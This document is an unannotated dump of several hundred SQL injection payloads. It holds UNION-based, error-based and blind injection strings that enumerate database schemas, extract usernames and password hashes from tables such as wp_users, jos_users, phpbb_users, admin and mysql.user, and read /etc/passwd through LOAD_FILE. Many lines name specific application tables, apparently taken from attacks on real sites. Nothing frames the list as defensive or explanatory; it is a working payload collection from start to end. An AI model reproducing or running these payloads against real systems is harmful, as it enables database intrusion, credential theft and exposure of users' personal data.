1,2,concat_ws(0x20,id,nick,pw,nname,icq,mail),4,5,6 from users where id=1/* 4 and 0 union select 1,concat_ws(0x3a,login,password),3,4,5 from users limit 0,1-- 4 AND 1=0 union select 0,0,0,concat(char(80),char(114),char(101),char(118),char(101),char(100)),concat(char(89), char(97),char(32),char(103),char(108),char(117),char(107)) 4 and 1=0 union select 1,2 -- 4 and 1=0 union select 1,2,3,4,5,6,7,group_concat(table_name separator 0x3c62723e) from information_schema.tables where table_schema=database()-- 4 and 1=0 UnIon selECt 1,2,3,4,5,6,version(),8,9,10,11,12,13,14,15,16,17,18,19,20 4 aNd 1=0 UNION SELECT 1,2,3,version() -- -4 and 1=0 union select 1,concat(username,char(58),password),3 from admin 4 and 1=0 union select 1,concat_ws(0x3a,uname,passwd) from authuser-- 4 and 1=0 union Select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema=0x6d616b62697a39325f636f6e74656e74-- 4 and 1=0 union select 1,user(),3,4,5 -- 4 and 1=0 union select version(),2,3,4,5,6,7 4 and 1=1/* -4 and 1=2 union select 1,2,3,4,5,6,7,8,unhex(hex(concat(version(),0x20,database(),0x20,user())))-- -4 and 1=2 union select 1,2,concat_ws(version(),user(),database(),@@version_compile_os),4,5,6,7,8,9,10 -- 4' and 1=2 union select 1,concat(username,0x3a,password) from jos_users/* 4 and 31337-31337=0 4 AND ASCII(SUBSTRING((select version()),1,1))=x 4 and substring(version(),1,1)=4 -- 4 and substr(version(),1,1)=5/* 4 or (1,1)=(select count(0),concat((select concat(username,char(58),hash_password) from users limit 0,1),floor(rand(0)*2))from(information_schema.tables) group by 2)-- 4 or(1,1)=(select count(0),concat((select table_name from information_schema.tables limit 17,1),floor(rand(0)*2))from(information_schema.tables) group by 1) -- 4 or 1 group by concat(concat_ws(0x3a,version(),user(),database()),floor(rand(0)*3))having min(0) -- 4 or(1)=(select * from(select * from auth_user as a auth_user as b USING(id))c)-- 4' or 1=(select top 1 table_name from information_schema.tables where table_name not in ('m_LogBuySpecies','syssegments','sysconstraints','m_LogBuy','ca_history','ca_holding','ca_lendar','ca_eventtype','dtproperties','ca_topictype','m_Activities','cm_city','m_BBER','m_changeLog','m_contacts','m_contacttype','m_EvalSurvey','m_CURFORMailList','m_equipprocess','m_facil_hold','m_contacts_hold','m_facilprod','m_inputdist','m_groups','m_LogPriceMailList','m_NAICS','m_Outlook03','m_outputdist','m_PrimBus','m_inputs','m_prod_hold','m_products','m_productstatus','m_SecondaryWoodSurvey2005','m_facility','m_SpecialtyLogMailList','m_vwcertNameAbbrev','m_TechList','m_vwcerts','m_VWCONTACTS','m_vwequipprocess','m_vwfacility','m_vwfacilprod','m_VWForAccess','m_vwinputs','m_SIC','m_vwLogBuySpecies','m_vwlogbuy','m_vwTechList','mf_globals','mID_vwContacts','mID_vwfacilprod','r_db','mID_vwfacility','r_orgtype','r_keywords','r_vwdb','m_SenateFinance1','r_services','m_certs','cm_county'))-- 4 or 1=(select top 1 @@version) -4;select cast(version() as int)-- 4;select version()::int,null,null,null,null,null,null,null,null,null,null,null from pg_user-- -4 union all select 1,2,group_concat(id,0x3a,name,0x3a,username,0x3a,email,0x3a,password,0x3a,usertype),4,5,6,7,8,9,10 from jos_users-- -4 union all select 1,2,group_concat(ID,0x3a,user_login,0x3a,user_pass,0x3a,user_email),4,concat_ws(version(),0x3a,database(),0x3a,user()),6,7 from wp_users limit 0,1-- -4 union all select 1,group_concat(id,0x3b,username,0x3b,password,0x3b),3,4,5 from jos_users limit 0,1-- -4 union all select aes_decrypt(aes_encrypt(concat_ws(0x3a,version(),user(),database(),@@version_compile_os),0x71),0x71)-- -4 union select 0,1,2,3,4,concat(USER(),0x3a,VERSION(),0x3a,DATABASE()),6,7,8,9,10,11,12/* -4 union select 0,concat(USER(),0x3a,VERSION(),0x3a,DATABASE()),2,3,4,5,6,7,8,9/* 4 UNION SELECT 0,concat_ws(0x0b,user(),version(),database()),2,3,4 LIMIT 9,3 -- -4 union select 0,convert(concat(USER(),0x3a,VERSION(),0x3a,DATABASE()) using latin1),2/* -4 union select 11111,concat_ws(0x3a,username,password) from users/* -4 union select 1,2,3,4,5 -- -4' union select 1,2,3,4,5-- -4 UNION SELECT 1,2,3,4,5-- -4 union select 1,2,3,4,5,6,6,8,SYSDATE(),6,concat_ws(0x20,user(),mysql.user.password,database(),version()),LOAD_FILE(char(47,101,116,99,47,112,97,115,115,119,100)),2,3 from mysql.user/* 4' union select 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3/* -4 uNIon sELEct 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 -- 4 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29/* -4 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,concat_ws(char(32,58,32),version(),user(),database()),30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50 from users/* -4' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,version(),26,27,28/* -4 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,group_concat(0x0b,column_name),24 from information_schema.columns where table_name=0x7573657273 -- -4 union select 1,2,3,4,5,6, 7,8,9,10,11,12,13,14,15,16,17,18,19,group_concat(userName,0x3a,password),21, 22,23,24,25,26,27,28 from users-- -4 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,group_concat(0x0b,column_name) from information_schema.columns where table_name=0x6163636f756e7473 -4 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,version(),15,16,17,18,19,20,21,22,23 from information_schema.tables -- -4 union select 1,2,3,4,5,6,7,8,9,10,11,12,load_file(0x2f6574632f706173737764),14,15,16,17,18,19,20,21,22-- -4 union select 1,2,3,4,5,6,7,8,9,10,11,12,version(),14,15,16,17,18,19,20,21,22-- -4 union select 1,2,3,4,5,6,7,8,9,10,11,column_name,13 from information_schema.columns where table_name=0x7573657273 -- -4 UNION SELECT 1,2,3,4,5,6,7,8,9,10,concat_ws(0x3a,user(),version(),database()),12,13-- -4 union select 1,2,3,4,5,6,7,8,9,10,group_concat(user(),0x0b,version(),0x0b,database()),12,13,14,15,16,17,18,19,20,21 -- -4 UNION SELECT 1,2,3,4,5,6,7,8,9,10,version(),12,13,14,15/* -4 union select 1,2,3,4,5,6,7,8,9,concat(version(),0x3a,user(),0x3a,database())-- 4 union select 1,2,3,4,5,6,7,8,9 from msysaccessobjects -4 union select 1,2,3,4,5,6,7,8,9,unhex(hex(group_concat(0x3a,user,0x3a,password,0x3a,file_priv))),11,12 from mysql.user -- 4 union select 1,2,3,4,5,6,7,8,concat(,chat.userinfo.name,';',chat.userinfo.realname,';',chat.userinfo.email,';',chat.userinfo.city,';',chat.userinfo.country,';',chat.userinfo.url,';',chat.userinfo.icq_uin,';',dating.users.MPASS,';',dating.users.PASS,';',dating.users.IPREG),10,11 from chat.userinfo inner join dating.users on chat.userinfo.name=dating.users.NICK limit 0,1/* 4 union select 1,2,3,4,5,6,7,8,concat_ws(0x3A,table_schema,TABLE_NAME),0,1,2,3,4,5,6,7,8,19 FROM INFORMATION_SCHEMA.TABLES limit 50,1/* -4 union select 1,2,3,4,5,6,7,8,concat_ws(0x3a,username,0x3a,password) from users limit 1,1 4 union select 1,2,3,4,5,6,7,8,concat_ws(0x3a,version(),user()),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68 -- 4' union select 1,2,3,4,5,6,7,8 from mysql.users limit 0,1/* -4 union select 1,2,3,4,5,6,7,concat(database(),0x3a,version()),9,10,11,12/* -4 union select 1,2,3,4,5,6,7,concat_ws(0x2F,cast(version() as binary),cast(database() as binary),cast(user() as binary))/* -4 union select 1,2,3,4,5,6,7,concat_ws(0x3a3a,username,password),9,10,11,12 from users -- -4' union select 1,2,3,4,5,6,7,concat_ws(0x3a,id,login,name,email,pass),9,10,11,12,13,14 from users limit 0,1/* -4 union select 1,2,3,4,5,6,7,concat_ws(0x3a,user(),database(),version()),9,10,11,12,13,14,15,16,17,18/* -4 union select 1,2,3,4,5,6,7,version()-- -4 union select 1,2,3,4,5,6,concat_ws(0x3a3a,version(),user(),database()),8,9,0,11,12,13,14,15,16,17,18,19,20,21,22 -4' UnIon selECt 1,2,3,4,5,6,concat_ws(0x3a,user(),version(),database()),8,9,10,11,12,13,14,15 -- -4/**/union/**/select/**/1,2,3,4,5,6,concat_ws(0x3a,version(),user(),database()),8,9,10 -- -4' union select 1,2,3,4,5,6,unhex(hex(user())),8,9,10,11,12,13,14 -- -4 union select 1,2,3,4,5,concat_ws(0x3a,user_id,username,user_password,user_email,user_level),7,8,9,0,1,2 from phpbb_users where user_level=1/* -4 union select 1,2,3,4,5,concat_ws(0x3a,version(),user(),database()),7 -4' union select 1,2,3,4,5 from information_schema.tables -- -4 UNION SELECT 1,2,3,4,5,TABLE_NAME,7,8,9,10,11,12 from INFORMATION_SCHEMA.TABLES limit 28,28/* -4 union select 1,2,3,4,column_name,6,7 from information_schema.columns where table_name=0x6f696c5f7573657273 -4 union select 1,2,3,4,concat(password,char(58) user),6,7,8,9,10 from mysql.passw,3/* 4 union select 1,2,3,4,concat(user(),0x3a,version(),0x3a,database()),6 -4 union select 1,2,3,4,concat(version(),0x3a,database(),0x2a,user())/* 4 union select 1,2,3,4,concat(version(),0x3a,user(),0x3a,database()),6,7,8,9/* -4 union select 1,2,3,4,concat_ws(0x2F,version(),database(),user()),6,7,8,1/* 4 union select 1,2,3,4,concat_ws(0x3a3a,id_account,name,pass) from system_accounts -- -4 union select 1,2,3,4,concat_ws(0x3a3a,version(), user(),database())-- -4 union select 1,2,3,4,concat_ws(0x3a3a,version(),user(),database())/* -4 union select 1,2,3,4,concat_ws(0x3a,id,0x3a,ip,0x3a,country,0x3a,referer),6,7,8,9,10 from site_log-- -4 union select 1,2,3,4,concat_ws(0x3a,url,email,password) from top_users/* -4 union select 1,2,3,4,concat_ws(0x3a,user(),database(),version())-- -4' union select 1,2,3,4,concat_Ws(0x3a,version(),database(),user()),6,7/* -4 union select 1,2,3,4,concat_ws(0x3a,version(),database(),user()),6,7,8,9 -- -4' union select 1,2,3,4,concat_ws(char(58),email,pass) from user where id limit 0,1/* -4 union select 1,2,3,4,concat_ws(user(),version(),database())-- -4 union select 1,2,3,4 from mysql.user -- -4 union select 1,2,3,4,group_concat(0x0b,column_name),6 from information_schema.columns where table_name=0x6B61695F75736572 -4 union select 1,2,3,4,group_concat(0x0b,table_name),6,7 from information_schema.tables -- -4 union select 1,2,3,4,load_file(0x2f7661722f7777772f66656c742f6c6962726172792e706870),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41/* 4 union select 1,2,3,4,LOAD_FILE('/etc/passwd'),6/* -4 union select 1,2,3,4,version(),6,7-- 4 union select 1,2,3,4,version(),6,7,8,9,10/* -4 union select 1,2,3,AES_DECRYPT(AES_ENCRYPT(database(),0x71),0x71),5,6,7,8,9,10,11/* -4 union select 1,2,3,concat(pass,0x3a,mail,0x3a,id),5,6,7,8,9 from user/* 4 UNION SELECT 1,2,3,concat(user(),char(58),version()),5,6,7/* -4' union select 1,2,3,concat(version(),0x20,database(),0x20,user()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32-- -4 union select 1,2,3,concat_ws(0x3a3a3a,username,password,email),5,6,7 from users -- -4' union select 1,2,3,concat_ws(0x3a3a,username,password,email),5,6,7 from rock_users /* -4' union select 1,2,3,concat_Ws(0x3a3a,username,password,email,admin) from ph515_users -- -4 union select 1,2,3,concat_ws(0x3a,database(),version(),user()),5,6,7,8,9,10,11,12-- 4 union select 1,2,3,concat_ws(0x3a,ID,Name,Password),5,6 from _magr_users-- 4 union select 1,2,3,concat_ws(0x3A,table_schema,TABLE_NAME),5,6,7,8,9,0,1,2,3,4,5,6,17 FROM INFORMATION_SCHEMA.TABLES/* -4 union select 1,2,3,concat_ws(0x3a,user(),version(),database()),5,6,7,8,9,10,11-- 4 UNION SELECT 1,2,3,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),5,6,7,8,9,10,11,12,13 LIMIT 1,1-- -4 union select 1,2,3,concat_ws(0x3a,version(),user(),database()),5,6,7,8,9 -- -4 union select 1,2,3,concat_ws(0xa,user_email,user_pass,user_nick,user_name) from admin_users-- -4 union select 1,2,3,convert(version() using cp1251)/* 4 union select 1,2,3 from msysaccessobjects -4 union select 1,2,3,group_concat(0x0b,column_name),5,6,7 from information_schema.columns where table_name=0x757365726c697374 -4 union select 1,2,3,group_concat(0x0b,column_name) from information_schema.columns where table_name=0x7573657273 -4 union select 1,2,3,group_concat(0x0b,username,0x3a,user_password) from sana_forum_users 4 union select 1,2,3,group_concat(table_name),5,6,7,8,9,10,11,12,13,14,15 from information_schema.tables-- 4 union select 1,2,3,group_concat(username,0x3a,password),5,6,7,8 from login -- -4 union select 1,2,3,id,5,pass,7,8,9 from user/* 4' union select 1,2,3,table_name,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4 from information_schema.tables/* -4 union select 1,2,3,unhex(hex(concat_ws(0x3a,version(),database(),user()))),5-- -4 union select 1,2,3,version()-- -4' union select 1,2,3,version(),5,6,7,8-- 4' union select 1,2,3,@@version,5,6,7,8,9-- -4 union select 1,2,column_name,4,5,6,7 from information_schema.columns where table_name=0x6d656d626572-- -4 UNION SELECT 1,2,CONCAT(0x3a,LOAD_FILE(0x2F6574632F706173737764),0x3a)-- -4' union select 1,2,concat(login,pass),4,5,6 from users/* -4 union select 1,2,concat(user,char(58),password),4,5,6 from mysql.user/* -4 union select 1,2,concat_ws(0x3a3a3a,username,pass,email),4 from users -- -4 union select 1,2,concat_ws(0x3a3a3a,username,password),4,5 from members -- -4' union select 1,2,concat_ws(0x3a3a,email,password),4,5,6,7,8,9,10,11,12,13,14 from users -- -4 uNIon sELEct 1,2,concat_ws(0x3a3a,id,email,pwd),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36 from admin -- -4 union select 1,2,concat_ws(0x3a3a,version(),user(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,128,129,130,131,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,160,161,162,163,164,165-- 4 union select 1,2,concat_ws(0x3a,database(),version(),user()),4,5,6,7,8,9-- -4 union select 1,2,concat_ws(0x3a,id,name_i,login_i,password_i,email,is_admin,uid,applied),4,5,6,7,8,9,10,11,12,13,14,15,16,17 from usrs-- 4 union select 1,2,concat_ws(0x3a,nickname,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41 from admins-- -4 union select 1,2,concat_ws(0x3a,nick,psw) from Users -- 4 union select 1,2,concat_ws(0x3a,user,0x3a,password,0x3a,file_priv),4,5,6,7,8 from mysql.user -4 union select 1,2,concat_ws(0x3a,user(),database(),version()),4,5/* -4' union select 1,2,concat_ws(0x3a,user_login,user_pass),4,5,6,7 from blog_users/* -4 union select 1,2,concat_ws(0x3a,user(),version()),4-- -4 union select 1,2,concat_ws(0x3a,user(),@@version_compile_os,version()),4 4 union select 1,2,concat_ws(0x3a,user(),version(),database()),4,5,6,7,8,9,10,11,12,13.html 4 union select 1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27-- -4 union select 1,2,concat_ws(0x3a,version(),user(),database(),@@version_compile_os),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 -- -4 union select 1,2,concat_ws(0x3b,version(),database(),user(),@@version_compile_os),4,5,6,7 -- -4 union select 1,2,concat_ws(char(58),id,name,uniqname,email),4,5,null,null,8,9 from selector/* -4 union select 1,2,CONCAT_WS(char(58),user(),database(),version()),4,5,6,7,8,9,10/* -4 union select 1,2,convert(version() using latin1),4 -4 union select 1,2,database(),4,5,6,7,8,9 -- -4 union select 1,2,group_concat(0x0b,column_name),4,5,6,7 from information_schema.columns where table_name=0x7765625f7573657273-- -4 union select 1,2,group_concat(0x0b,column_name),4,5 from information_schema.columns where table_name=0x61757468 -4 union select 1,2,group_concat(0x0b,column_name) from information_schema.columns where table_name=0x7573657273 -4 union select 1,2,group_concat(0x0b,oa_login,0x3a,oa_pswd_md5,0x3a,email,0x3a,def_discount),4 from oa_users -4 union select 1,2,group_concat(name,0x3a,pass),4 from zugriff-- -4' union select 1,2,pass,4,login,6,7 from admin /* -4 union select 1,2,(select(@x)from(select(@x:=0x00),(select(null)from(information_schema.columns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(0x00)in(@x:=concat(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name))))x)-- -4' union select 1,2,table_name,4,5,6,7 from information_schema.tables /* -4 union select 1,2,table_name,4,5,6 from information_schema.tables -- -4 uNIon sELEct 1,2,'test',4,5,6 -- -4 union select 1,2,unhex(hex(concat_ws(0x0b,@@version,user(),database(),@@version_compile_os))),4,5,6,7,8,9,10,11,12,13-- -4 union select 1,2,unhex(hex(version())),4,5,6 -4 union Select 1,2,unhex(hex(version())),4,5,6 from news/* -4 UNION SELECT 1,2,USER(),4,version(),database(),7,8,9,10,11,12/* 4 union select 1,2,user(),version(),5-- 4 union select 1,2,user(),version(),5 limit 1,1/* -4 union select 1,2,version(),4/* 4' union select 1,2,version(),4-- 4' union select 1,2,version(),4,5,6,7,8/* -4 UnIon SeLect 1,2,version(),4,5,6,7,8,9,10,11,12,13 /* 4 union select 1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17-- -4 union select 1,AES_DECRYPT(AES_ENCRYPT(concat(user(),char(58),database(),char(58),@@version),0x71),0x71)/* -4 union select 1,aes_decrypt(aes_encrypt(group_concat(table_name),1),1) from information_schema.tables limit 0,1-- -4 union select 1,aes_decrypt(aes_encrypt(version(),0x71),0x71),3,4,5,6,7,8,9,10,11,12,13,14/* -4 union select 1,column_name,3 from information_schema.columns where table_name=0x64656661756c745f557365724442-- 4 UNION SELECT 1,concat(user,0x3a,pass),3 From users/* -4 union select 1,concat(usr,char(58),pwd),3,4,5,6,7,8,9,10,11,12,13,14,15,16 from ssp_usrs -- 4 union select 1,concat(version(),0x3a,database(),0x3a,user()),3,4/* 4 union select 1,concat(version(),database(),user()),3,4,5,6,7,8 -4 union select 1,concat_ws(0x0b,username,0x3a,password,0x3a,admin_priv) from roda_survey_users limit 0,1 -- -4 UNION SELECT 1,concat_Ws(0x0b,user(),version(),database()),3,4 -- -4 union select 1,concat_ws(0x0b,version(),user(),database(),@@version_compile_os),3-- -4 union select 1,concat_ws(0x2a,database(),version(),user(),@@version_compile_os),3,4,5 -4 union select 1,concat_ws(0x2F,version(),database(),user()),3,4,5/* -4' union select 1,concat_ws(0x2F,version(),database(),user()),3,4,5,6/* -4 union select 1,concat_Ws(0x3a3a,usuario,clave),3 from usuarios -- -4 union select 1,concat_ws(0x3a,ID,Login,Password),3,4,5,6,7,8,9,0,1,2 from FE_se_users-- 4 union select 1,concat_ws(0x3a,id,username,password),3,4,5,6,7 from adminlogin-- -4' union select 1,concat_ws(0x3a,login,pass),3,4,5,6 from admins/* -4 union select 1,concat_ws(0x3a,login,password),3 from users limit 31,1 4 union select 1,concat_ws(0x3a,table_schema,table_name,column_name),3,4,5,6,7 from information_schema.columns 4 union select 1,concat_ws(0x3a,user(),database(),version()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41-- -4 union select 1,concat_ws(0x3a,user_id,login_name,login_pwd,user_email),3,4,5,6,7,8,9,10,11,12 from btn_user -- 4 union select 1,concat_ws(0x3a,user(),@@version,database(),@@version_compile_os),3,4,5,6,7,8 -- -4 union select 1,concat_ws(0x3a,@@version_compile_os,user(),version(),database()),3,4,5,6,7,8,9,0,1,2,3-- -4' union select 1,concat_ws(0x3a,version(),database(),user()),3,4,5/* 4 union select 1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7/* -4 union select 1,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),3,4,5,6-- -4 union select 1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9,10,11,12-- -4 union select 1,concat_ws(0x3C62723E,VERSION(),DATABASE(),USER()) -4 union select 1,concat_ws(0xa,version(),user(),database()),3,4,5 -4 union select 1,concat_ws(user_login,0x3a,user_pass) from wp_users-- 4 union select 1,convert(user() using binary),3,4,5,6,7 -4 union select 1,convert(user using latin1),3,4 from mysql.user limit 0,1/* -4 union select 1,convert(version() using latin1),3,4/* -4 union select 1,convert(version() using latin1),3,4 from users -4 UnIoN SeLecT 1,database(),3,4,5,6,7,8,9 -- -4 union select 1,group_concat(0x0b,admin_id,0x3a,admin_name,0x3a,admin_pwd),3,4,5,6,7,8,9,10 from admin -- -4 union select 1,group_concat(0x0b,column_name),3,4 from information_schema.columns where table_name=0x427573546f7055736572 -4 union select 1,group_concat(0x0b,column_name) from information_schema.columns where table_name=0x61646D696E6973747261746F7273 -4 union select 1,group_concat(0x0b,id,0x3a,user,0x3a,pass),3,4 from admin -4 union select 1,group_concat(0x0b,Id_Admin,0x3a,Titre_Admin,0x3a,Pass_Admin),3,4,5 from Admin -- -4 union select 1,GROUP_CONCAT(column_name),3,4,5 from information_schema.columns where table_name=0x70687062625f7573657273-- -4 union select 1,group_concat(id,0x3a,username,0x3a,password,0x3c62723e),3,4 from admin-- -4 union select 1,group_concat(table_name),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from information_schema.tables-- -4 union select 1,group_concat(table_name),3,4,5,6,7,8,9 from information_schema.tables /* 4 union select 1,mail,3,pass,5,6,7,8,9 from user/* -4 union select 1,name,3,4,5,6,7 from members -4 union select 1,password,3,email from users/* 4 union select 1,table_name,3,4,5,6,7,8 from information_schema.tables -- 4 union select 1,table_name,3,4,5,6,7 from INFORMATION_SCHEMA.TABLES/* -4 union select 1,table_name,3,4 from information_schema.tables -4 union select 1,table_name,3 from information_schema.tables-- 4 union select 1,unhex(hex(concat(version(),0x3a,database(),0x3a,user()))),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30 limit 1,1/* 4 union select 1,unhex(hex(concat_ws(0x3a3a,version(),user(),database()))),3,4,5,6,7,8,9,10,11/* -4 union select 1,unhex(hex(concat_ws(0x3a,user(),version(),database()))),3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18 -- -4 union select 1,unhex(hex(group_concat(table_name))),3 from information_schema.tables-- -4 union select 1,user_name,3,password,5,6,7,8 from users limit 5,1 /* -4 union select 1,versio(),3,4,5,6,7,8/ -4 union select 1,version(),3,4-- -4 union select 1,version(),3,4,5,6,7,8,9,10,11 -- -4 union select 1,version(),3,4,5,6,7,8,9,10,11,12 -- 4 union select 1,version(),3,concat_ws(0x2F,id,pass),5,6,7,8,9 from user/* -4 union select column_name from information_schema.columns where table_name=0x616363657373 -- -4 union select concat(0x3C68313E,user(),0x3a,database(),0x3a,version(),0x3C2F68313E),2,3-- -4 union select concat(id,char(58),pass),2,email from users/* -4 union select concat(login,0x3a,pwd) from users limit 4,1/* -4 union select concat(login,7,password) from users -4 union select concat(user(),0x3a,version(),0x3a,database()) -4 union select concat(username,0x3a,password),2 from author/* -4 union select concat(username,char(58),password) from phorum_users where admin=1/* 4 union select concat_ws(0x2f,username,user_password),2,3,4,5 from phpbb_users limit 1,1-- 4 union select concat_ws(0x2,version(),user(),database()),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 -4 union select concat_ws(0x3a3a,database(),version(),user()),2-- -4 union select concat_ws(0x3a3a,version(),user(),database())-- -4 union select concat_ws(0x3a3a,version(),user(),database(),@@version_compile_os),2,3,4,5-- -4 union select concat_ws(0x3a,adminuser,adminpass) from wmp_admin-- -4 union select concat_ws(0x3a,user(),database(),version()),2,3,4-- -4 union select concat_ws(0x3a,username,password) from ianshop_wordpress.shop_admin-- -4 union select concat_ws(0x3a,user,password),2 from mysql.user/* -4 union select concat_ws(0x3a,user,password,file_priv,0x3a,host) from mysql.user -4 union select concat_ws(0x3a,user(),version(),database()),2,3,4,5,6/* -4 union select concat_ws(0x3a,version(),0x3a,user(),@@version_compile_os),2,3-- 4' union select concat_ws(0x3a,version(),database(),user(),@@datadir,@@tmpdir,@@version_compile_os),2 from information_schema.columns limit 1,1/* 4 union select concat_ws(char(58),user(),version()) limit 1,1-- -4 union select concat_ws(char(58),version(),user(),database()) from users/* -4 union select concat_ws(user,0x3a,password),2 from mysql.user where user='root'-- -4 UNION SELECT concat_ws(user(),version(),database())-- -4 union select concat_ws(@@version,user(),database(),@@version_compile_os),2,3,4,5,6 -- -4 union select group_concat(0x0b,column_name) from information_schema.columns where table_name=0x7573657273 -4 union select group_concat(0x3a,version(),0x3a,user()) -- -4 UNION SELECT group_CONCAT(id,0x3a,login,0x3a,passw),2 FROM users-- -4 union select group_concat(login,0x3a,password,0x3a,name,0x3a,email,0x3a,admin SEPARATOR 0x3C62723E) from auth_user-- -4 union select usename||chr(58)||passwd from pg_user limit 1 offset 2-- -4 union select user()/* -4 union select user,2,3,4,5,6,7 from users-- -4 union select username,user_password,3,4 from phpbb_users limit 1,1/* -4 union select version(!)-- -4 union select version() -- -4 union/***yu*/select 1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15-- 50000 union select concat_ws(0x3a,username,user_password,user_email,user_icq) from phpbb_users limit 1,1/* 500018' union select 1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17/* -5000 union select 1,table_name,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7 from information_schema.columns where column_name like "%25login%25" limit 0,1-- 500109999 union select 1,mail,3,4 from us/* 5009 and 1=0 union select 1,2,3,4,version(),6,7,8,9,10,11,12,13,14-- 500 or 1=(SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME NOT IN ('DETAILS','BOARD','CATALOG','CATALOG_TEMP','CDCONT','COMPANY','COMPANY_REJECT','D99_Tmp','DET_CODE','DET_VIEW','DETAILS_TEMP','division','dtproperties','FREE','FREEBOARD','GRP_CODE','GRP_VIEW','h_NEWS','input_c','j_BOARD','jorye','NEWSBOARD','NOTICE','poll','poll_re','POSTNO','PRODUCTS','PRODUCTS_CHECK','PRODUCTS_REJECT','PRODUCTS_TEMP','PRODUCTS_TEMP_CHECK,'PRODUCTS_TEMP_CHECK'))-- -500' union select 1,2,3,4,5,6,7,8-- 500 union select 1,concat_ws(0x3a,unhex(hex(version())),unhex(hex(user())),unhex(hex(database()))),3,4,5,6,7,8,9-- -500 union select 1,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),3-- -500 union select concat(uname,0x3a,pass) from strip_users limit 0,1/* 5016 UNION SELECT 1,2,3,concat(user(),0x3a,version(),0x3a,database()),5,6,7,8,9,10,11,12,13/* 501 and 1=2 union select 1,user(),version(),4,5 -- -501 union select 1,2,3,4,concat_Ws(0x3a,version(),user(),database()),6, -501 union select 1,2,3,group_concat(username,0x3a,password,0x3a,grp,0x3a,access,0x0b),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53 from apollo12.admin_users -- -501' union select 1,2,concat_ws(0x2a,database(),version(),user(),@@version_compile_os),4,5,6,7,8,9,10,11,12,13,14 -- -501 union select 1,2,version(),concat_ws(0x3a3a,user(),database()),5,6,7,8,9,10,11,12/* 5020 and ascii(lower(substring((select table_name from information_schema.tables limit 17,1),1,1)))>1 -503 union select 1,2,3,concat(version(),0x3a,database(),0x3a,user()),5,6/* -503 union select concat(0x2a,name,0x2a,password,0x2a,email),2,3,4,5 from user -5046' union select 1,2,user(),4,5,6,7,8,9,10,11,12,13,14 -- 504 and 1=0 UNION SELECT 1,2,3,4,version(),6,7,8,9,10 -- 504 union select null,null,cast(usename||chr(58)||passwdasint),null,null,null from pg_shadow-- -5058 union select 1,2,3,4,concat_ws(0x3a,version(),user(),database()),6/* -505 union all select 1,2,3,4,concat(sbadmin_name,0x3a,sbadmin_pwd),6,7,8,9,10,11 from sbjks_admin-- -505 union select 1,2,3,4,5,concat_ws(0x3a,admin_username,admin_password),7,8,9,0,1,2,3,4,5,6,7,8 from admin/* -5065 union select 1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22-- -5066 union select 1,2,3,column_name,5,6,7,8,9,10,11,12 from information_schema.columns/* -5066 union select 1,2,3,table_name,5,6,7,8,9,10,11,12 from information_schema.tables limit 29,1/* 